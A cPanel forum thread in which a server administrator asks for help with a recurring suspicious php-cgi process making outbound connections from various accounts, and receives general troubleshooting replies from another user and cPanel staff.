Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Suspicious process running under user

Discussion in 'Security' started by Alain Bensimon, Apr 23, 2017.

  1. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Hello,
    I have a server with centos 7.4
    My firewall gives me these messages below.
    I run maldet, erase all the threats, and a few days later, it comes back.
    I dont know ho to prevent these threats.
    thank you
    --------------------------------------------------------


    Suspicious process running under user...(always diffetent users)
    Executable:

    /opt/cpanel/ea-php56/root/usr/bin/php-cgi

    Command Line (often faked in exploits):

    /opt/cpanel/ea-php56/root/usr/bin/php-cgi

    Network connections by the process (if any):

    tcp: 192.99.39.58:60352 -> 69.30.221.50:80

    Files open by the process (if any):

    /var/cpanel/locale/en.cdb
     
  2. SysSachin

    SysSachin Well-Known Member

    Joined:
    Aug 23, 2015
    Messages:
    604
    Likes Received:
    42
    Trophy Points:
    28
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Twitter:
    The path is valid. It's not Suspicious process so you have to add this path in firewall ignore list.
    Please check the same post
    Suspicious process running under
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Even if the path is valid, I dont think its legit. I dont understand why accounts would start to launch a bunch of requests.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    Were you able to review my previous response regarding this issue (it's after the initial response you received from another user)?

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    I did but weirdly the users wich are making these connections are not using wordpress.
    I'm really lost and dont know what to do
     
  7. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    You will sometimes see this type of activity when a PHP script is making a connection to an update server for automatic updates to the script.

    You can review the PHP files uploaded to the account referenced in the notification to see if it's using any specific PHP scripts that make outgoing connections to the referenced IP address. You may also want to reach out to the individual account holder to request information about the activity.

    If you require additional help, you can find a list of system administration services on the following URL:

    System Administration Services | cPanel Forums

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Actually, these scripts are launched from users that don't even have any activity besides emails. No website or anything else. And the script start multiple processes with the same user, all targeting the same IP.
    And if I suspend the user, a few hours later, it starts with another user.
    I also had some who were sending spams, but I disabled mail in PHP so I don't have this problem anymore.
    I am convinced that its malicious, but I just dont know how to get rid of it.
     
  9. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    I recommend seeking out assistance from a qualified system administrator if you'd like further investigation into what could be causing the issue on the affected server. We provide a list of companies offering system administration services in the URL from my last response.

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  10. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Can you recommend me one of them please.
     
  11. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    It's against our policy to recommend a specific vendor, but you are welcome to search their company names on a search engine or another forum such as WebHostingTalk to see if you can find existing reviews.

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice